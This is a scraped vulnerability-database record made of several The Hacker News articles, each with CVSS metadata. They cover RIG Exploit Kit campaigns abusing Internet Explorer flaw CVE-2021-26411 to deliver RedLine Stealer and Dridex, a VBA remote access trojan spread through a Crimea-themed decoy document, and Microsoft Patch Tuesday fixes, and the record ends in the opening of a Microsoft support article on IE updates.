"A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.\n\n\"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server,\" Bitdefender [said](<https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/>) in a new report shared with The Hacker News.\n\nMost of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.\n\nExploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.\n\nThe primary infection method used by attackers to distribute exploit kits, in this case the [Rig Exploit Kit](<https://blog.talosintelligence.com/2016/11/rig-exploit-kit-campaign-happy-puzzling.html>), is through compromised websites that, when visited, drop the exploit code to ultimately send the RedLine Stealer payload to carry out follow-on attacks.\n\nThe flaw in question is 
[CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been [previously](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) [weaponized](<https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html>) by North Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.\n\n\"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection,\" the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.\n\nRedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.\n\nThis is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP [detailed](<https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/>) a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.\n",
"cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-28T08:20:00", "type": "thn", "title": "New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2022-04-28T08:20:39", "id": "THN:4225CEE6D7775276254C20B6E19126AE", "href": "https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "An unidentified threat actor has been exploiting a now-patched zero-day flaw in Internet Explorer browser to deliver a fully-featured VBA-based remote access trojan (RAT) capable of accessing files stored in 
compromised Windows systems, and downloading and executing malicious payloads as part of an \"unusual\" campaign.\n\nThe backdoor is distributed via a decoy document named \"Manifest.docx\" that loads the exploit code for the vulnerability from an embedded template, which, in turn, executes shellcode to deploy the RAT, according to cybersecurity firm Malwarebytes, which spotted the suspicious Word file on July 21, 2021. \n\nThe malware-laced document claims to be a \"Manifesto of the inhabitants of Crimea\" calling on the citizens to oppose Russian President Vladimir Putin and \"create a unified platform called 'People's Resistance.'\"\n\nThe Internet Explorer flaw, tracked as **CVE-2021-26411**, is notable for the fact that it was abused by the North Korea-backed Lazarus Group to [target security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development.\n\nEarlier this February, South Korean cybersecurity firm ENKI [revealed](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) the state-aligned hacking collective had made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer. Microsoft [addressed the issue](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) as part of its Patch Tuesday updates for March.\n\nThe Internet Explorer exploit is one of the two ways that's used to deploy the RAT, with the other method relying on a social engineering component that involves downloading and executing a remote macro-weaponized template containing the implant. 
Regardless of the infection chain, the use of double attack vectors is likely an attempt to increase the likelihood of finding a path into the targeted machines.\n\n\"While both techniques rely on template injection to drop a full-featured remote access trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery,\" Malwarebytes researcher Hossein Jazi said in a [report](<https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manifesto-deploys-vba-rat-using-double-attack-vectors/>) shared with The Hacker News. \"The attackers may have wanted to combine social engineering and exploit to maximize their chances of infecting targets.\"\n\nBesides collecting system metadata, the VBA RAT is orchestrated to identify antivirus products running on the infected host and execute commands it receives from an attacker-controlled server, including reading, deleting, and downloading arbitrary files, and exfiltrate the results of those commands back to the server.\n\nAlso discovered by Malwarebytes is a PHP-based panel nicknamed \"Ekipa\" that's used by the adversary to track victims and view information about the modus operandi that led to the successful breach, highlighting successful exploitation using the IE zero-day and the execution of the RAT.\n\n\"As the [conflict between Russia and Ukraine](<https://en.wikipedia.org/wiki/Russo-Ukrainian_War>) over Crimea continues, cyber attacks have been increasing as well,\" Jazi said. \"The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.\"\n",
"cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-29T15:18:00", "type": "thn", "title": "Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-07-29T15:18:26", "id": "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "href": "https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-22T05:57:19", "description": "The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware 
for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022.\n\nThe switch in modus operandi, [spotted](<https://www.bitdefender.com/blog/labs/rig-exploit-kit-swaps-dead-raccoon-with-dridex/>) by Romanian company Bitdefender, comes in the wake of Raccoon Stealer [temporarily closing the project](<https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html>) after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.\n\nThe Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month.\n\nThat said, the Raccoon Stealer actors are already working on a second version that's expected to be \"rewritten from scratch and optimized.\" But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.\n\n[Dridex](<https://www.cisa.gov/uscert/ncas/alerts/aa19-339a>) (aka Bugat and Cridex), for its part, has the capability to download additional payloads, infiltrate browsers to steal customer login information entered on banking websites, capture screenshots, and log keystrokes, among others, through different modules that allow its functionality to be extended at will.\n\nIn April 2022, Bitdefender [discovered](<https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html>) another Rig Exploit Kit campaign distributing the RedLine Stealer trojan by exploiting an Internet Explorer flaw patched by Microsoft last year 
([CVE-2021-26411](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>)).\n\nThat's not all. Last May, a separate campaign [exploited](<https://www.bitdefender.com/blog/labs/new-wastedloader-campaign-delivered-through-rig-exploit-kit/>) two scripting engine vulnerabilities in unpatched Internet Explorer browsers ([CVE-2019-0752](<https://nvd.nist.gov/vuln/detail/CVE-2019-0752>) and [CVE-2018-8174](<https://nvd.nist.gov/vuln/detail/CVE-2018-8174>)) to deliver a malware called WastedLoader, so named for its similarities to WastedLocker but lacking the ransomware component.\n\n\"This once again demonstrates that threat actors are agile and quick to adapt to change,\" the cybersecurity firm said. \"By design, Rig Exploit Kit allows for rapid substitution of payloads in case of detection or compromise, which helps cyber criminal groups recover from disruption or environmental changes.\"\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-22T05:41:00", "type": "thn", "title": "RIG Exploit Kit Now Infects Victims' PCs With Dridex Instead of Raccoon Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8174", "CVE-2019-0752", "CVE-2021-26411"], "modified": "2022-06-22T05:41:58", "id": "THN:DE791A2DD37FD88B59147561CF1F7BBF", "href": "https://thehackernews.com/2022/06/rig-exploit-kit-now-infects-victims-pcs.html", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:11", "description": "Microsoft earlier today released its August 2020 batch of software security updates for all supported versions of its Windows operating systems and other products. \n \nThis month's Patch Tuesday updates address a total of 120 newly discovered software vulnerabilities, of which 17 are critical, and the rest are important in severity. 
\n \nIn a nutshell, your Windows computer can be hacked if you: \n \n\n\n * Play a video file \u2014 thanks to flaws in [Microsoft Media Foundation](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1525>) and [Windows Codecs](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1585>)\n * Listen to audio \u2014 thanks to bugs affecting Windows Media Audio Codec\n * Browse a website \u2014 thanks to 'all time buggy' Internet Explorer\n * Edit an HTML page \u2014 thanks to an [MSHTML Engine](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1567>) flaw\n * Read a PDF \u2014 thanks to a loophole in Microsoft Edge PDF Reader\n * Receive an email message \u2014 thanks to yet another bug in [Microsoft Outlook](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1483>)\n \nBut don't worry, you don't need to stop using your computer or go without Windows OS on it. All you need to do is click on the Start Menu \u2192 open Settings \u2192 click Security and Update, and install any new update that is available. \n \n\n\n## Install Updates! Two Zero-Days Under Active Attacks\n\n \nAnother reason why you should not ignore this advice is that two of the security flaws have reportedly been exploited by hackers in the wild and one was publicly known at the time of release. \n \nAccording to Microsoft, one of the zero-day vulnerabilities under active attack is a remote code execution bug that resides in the scripting engine's library jscript9.dll, which is used by default by all versions of Internet Explorer since IE9. \n \nThe vulnerability, tracked as [CVE-2020-1380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1380>), was spotted by Kaspersky Labs and has been rated critical because Internet Explorer remains an important component of Windows as it still comes installed by default in the latest Windows. 
\n \nKaspersky researchers explain that the flaw is a use-after-free vulnerability in JScript that corrupts the dynamic memory in Internet Explorer in such a way that an attacker could execute arbitrary code in the context of the current user. So, if the current user is logged in with administrative privileges, the attacker could control the affected system. \n \n\"An attacker could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements,\" Microsoft says in its advisory. \n \nThe zero-day was exploited by unknown threat actors as part of '**Operation PowerFall**' attacks, and Kaspersky has published [proof-of-concept exploit](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) code and technical details for the vulnerability. \n \nThe second zero-day vulnerability\u2014tracked as [CVE-2020-1464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1464>) and under active exploitation\u2014is a Windows spoofing bug that exists when Windows incorrectly validates file signatures. \n \nThis zero-day bug affects all supported versions of Windows and allows attackers to load improperly signed files by bypassing security features intended to prevent incorrectly signed files from being loaded. \n \nBesides these, notably, the batch also includes a critical patch for an elevation of privilege [flaw affecting NetLogon](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) for Windows Server editions, where this RPC service serves as a domain controller. 
\n \nTracked as 'CVE-2020-1472,' the vulnerability can be exploited by unauthenticated attackers to use Netlogon Remote Protocol (MS-NRPC) to connect to a Domain Controller (DC) and obtain administrative access to run malicious applications on a device on the network. \n \nHome users and server administrators are strongly recommended to apply the latest security patches as soon as possible to prevent malware or miscreants from exploiting the flaws and gaining complete remote control over their vulnerable computers.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-12T12:25:00", "type": "thn", "title": "Microsoft Reveals New Innocent Ways Windows Users Can Get Hacked", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-1483", "CVE-2020-1525", "CVE-2020-1567", "CVE-2020-1585"], 
"modified": "2020-08-12T12:35:52", "id": "THN:0A61A90DD0F88453854B73FE249BC379", "href": "https://thehackernews.com/2020/08/microsoft-software-patches.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-28T20:14:08", "description": "The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal.\n\n\"RIG EK is a financially-motivated program that has been active since 2014,\" Swiss cybersecurity company PRODAFT [said](<https://www.prodaft.com/resource/detail/rig-rig-exploit-kit-depth-analysis>) in an exhaustive report shared with The Hacker News.\n\n\"Although it has yet to substantially change its exploits in its more recent activity, the type and version of the malware they distribute constantly change. The frequency of updating samples ranges from weekly to daily updates.\"\n\nExploit kits are programs used to distribute malware to large numbers of victims by taking advantage of known security flaws in commonly-used software such as web browsers.\n\nThe fact that [RIG EK](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rig-exploit-kit-diving-deeper-into-the-infrastructure/>) runs as a service model means threat actors can financially compensate the RIG EK administrator for installing malware of their choice on victim machines. 
The RIG EK operators primarily employ malvertising to ensure a high infection rate and large-scale coverage.\n\nAs a result, visitors using a vulnerable version of a browser to access an actor-controlled web page or a compromised-but-legitimate website are redirected using malicious JavaScript code to a proxy server, which, in turn, communicates with an exploit server to deliver the appropriate browser exploit.\n\nThe exploit server, for its part, detects the user's browser by parsing the User-Agent string and returns the exploit that \"matches the pre-defined vulnerable browser versions.\"\n\n\"The artful design of the Exploit Kit allows it to infect devices with little to no interaction from the end user,\" the researchers said. \"Meanwhile, its use of proxy servers makes infections harder to detect.\"\n\nSince arriving on the scene in 2014, RIG EK has been observed delivering a wide range of financial trojans, stealers, and ransomware such as [AZORult](<https://www.malware-traffic-analysis.net/2018/01/30/index.html>), [CryptoBit](<https://unit42.paloaltonetworks.com/unit42-cryptobit-another-ransomware-family-gets-an-update/>), [Dridex](<https://thehackernews.com/2022/06/rig-exploit-kit-now-infects-victims-pcs.html>), Raccoon Stealer, and WastedLoader. 
The operation was [dealt a huge blow](<https://www.bleepingcomputer.com/news/security/rig-exploit-kit-suffers-major-blow-following-coordinated-takedown-action/>) in 2017 following a coordinated action that dismantled its infrastructure.\n\nRecent RIG EK campaigns have [targeted](<https://thehackernews.com/2022/04/new-rig-exploit-kit-campaign-infecting.html>) a memory corruption vulnerability impacting Internet Explorer ([CVE-2021-26411](<https://nvd.nist.gov/vuln/detail/CVE-2021-26411>), CVSS score: 8.8) to deploy RedLine Stealer.\n\nOther browser flaws weaponized by the malware include [CVE-2013-2551](<https://nvd.nist.gov/vuln/detail/CVE-2013-2551>), [CVE-2014-6332](<https://nvd.nist.gov/vuln/detail/cve-2014-6332>), [CVE-2015-0313](<https://nvd.nist.gov/vuln/detail/CVE-2015-0313>), [CVE-2015-2419](<https://nvd.nist.gov/vuln/detail/CVE-2015-2419>), [CVE-2016-0189](<https://nvd.nist.gov/vuln/detail/CVE-2016-0189>), [CVE-2018-8174](<https://nvd.nist.gov/vuln/detail/CVE-2018-8174>), [CVE-2019-0752](<https://nvd.nist.gov/vuln/detail/CVE-2019-0752>), and [CVE-2020-0674](<https://nvd.nist.gov/vuln/detail/cve-2020-0674>).\n\nAccording to data collected by PRODAFT, 45% of the successful infections in 2022 leveraged CVE-2021-26411, followed by CVE-2016-0189 (29%), CVE-2019-0752 (10%), CVE-2018-8174 (9%), and CVE-2020-0674 (6%).\n\nBesides Dridex, Raccoon, and RedLine Stealer, some of the notable malware families distributed using RIG EK are [SmokeLoader](<https://thehackernews.com/2022/07/smokeloader-infecting-targeted-systems.html>), [PureCrypter](<https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html>), 
[IcedID](<https://thehackernews.com/2023/01/icedid-malware-strikes-again-active.html>), [ZLoader](<https://thehackernews.com/2022/04/microsoft-disrupts-zloader-cybercrime.html>), [TrueBot](<https://thehackernews.com/2022/12/new-truebot-malware-variant-leveraging.html>), [Ursnif](<https://thehackernews.com/2022/10/latest-ursnif-variant-shifts-focus-from.html>), and [Royal ransomware](<https://thehackernews.com/2022/12/royal-ransomware-threat-takes-aim-at-us.html>).\n\nFurthermore, the exploit kit is said to have attracted traffic from 207 countries, reporting a 22% success rate over the past two months alone. The largest number of compromises are located in Russia, Egypt, Mexico, Brazil, Saudi Arabia, Turkey, and several countries across Europe.\n\n\"Interestingly enough, the exploit try rates were the highest on Tuesday, Wednesday and Thursday - with successful infections taking place on the same days of the week,\" the researchers explained.\n\nPRODAFT, which also managed to gain visibility into the kit's control panel, said there are about six different users, two of whom (admin and vipr) have admin privileges. A user profile with the alias \"pit\" or \"pitty\" has subadmin permissions, and three others (lyr, ump, and test1) have user privileges.\n\n\"admin\" is also a dummy user mainly reserved for creating other users. The management panel, which works with a subscription, is controlled using the \"pitty\" user.\n\nHowever, an operational security blunder that exposed the git server led PRODAFT to de-anonymize two of the threat actors. 
It also assessed with high confidence that the developer of the Dridex malware has a \"close relationship\" with the RIG EK's administrators, owing to the additional manual configuration steps taken to \"ensure that the malware was distributed smoothly.\"\n\n\"Overall, RIG EK runs a very fruitful business of exploit-as-a-service, with victims across the globe, a highly effective exploit arsenal and numerous customers with constantly updating malware,\" the researchers said.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-27T15:33:00", "type": "thn", "title": "Researchers Share New Insights Into RIG Exploit Kit Malware's Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", "CVE-2014-6332", "CVE-2015-0313", "CVE-2015-2419", "CVE-2016-0189", "CVE-2018-8174", "CVE-2019-0752", "CVE-2020-0674", "CVE-2021-26411"], "modified": "2023-02-28T18:45:18", "id": 
"THN:35964D30086BA86E15030F5A7D404BE6", "href": "https://thehackernews.com/2023/02/researchers-share-new-insights-into-rig.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of 
security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for a zero-day in Internet Explorer (CVE-2021-26411) that was discovered as exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. 
First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out of bounds read (CVE-2021-26877) and out of bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or select Check for Windows updates.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-06-23T19:31:14", "description": "None\nThis article applies to the following:\n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet 
Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n**Important**\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The March 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets. \n--- \n \n## Summary\n\nThis security update resolves vulnerabilities in Internet Explorer. 
